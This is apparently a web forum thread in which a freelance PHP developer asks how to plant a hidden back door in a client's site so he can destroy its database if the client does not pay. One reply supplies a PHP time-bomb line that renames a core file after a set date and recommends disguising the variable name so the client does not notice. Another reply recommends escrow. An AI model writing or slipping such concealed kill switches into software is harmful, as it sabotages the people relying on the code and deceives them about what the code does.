I've been developing my first php sites as a freelancer and have a slight payment problem. I would like to give the client the site, as more work is promised, but I'm not over convinced he's going to pay!
I want to build a back door that will allow me to delete the database tables. Probably not ethical, but neither is not paying!

Only the admin area has a log in (htaccess) which can clearly be changed denying me access.

Can anyone please suggest the best method. Something that would not be noticable looking at the code (although they are not programmers), not make the site vunerable to attack from others until the point comes when I can remove it (when they have paid)

personally I'd advise against removing db data unless you actually added the data yourself. even though you wrote the scripting behind the app, if they entered the data and you destroy that, the ball will be in their court when you get to court.

just knockout one of the main files (one that you wrote and own until paid for) if possible.

$killswitch = (time() > 12341323) ? rename('db_access.php','db_axess.php') : '';
// untested, should work tho. just renames the file whenever the page is called if a certain date has passed.

where 12341323 is the unix timestamp of the 'payment by...' date.

might want to call it something other than $here_be_the_kill_switch and just subtely rename an important file which you have script permissions for.

I suggest you use an escrow payment system .So you can see if the webmaster paid you or not.If you put the script on his server an he knows a little php than a look over the code will ruin your efforts

Again thanks for the idea.
In Germany credit cards are not the norm - hence you can still buy things on the internet and be billed after delivery!
Putting these sorts of barriers between me and the client would probably result in me not having the client.
I come from UK where the idea of these payment systems would be easilly accepted, but here unfortunately not.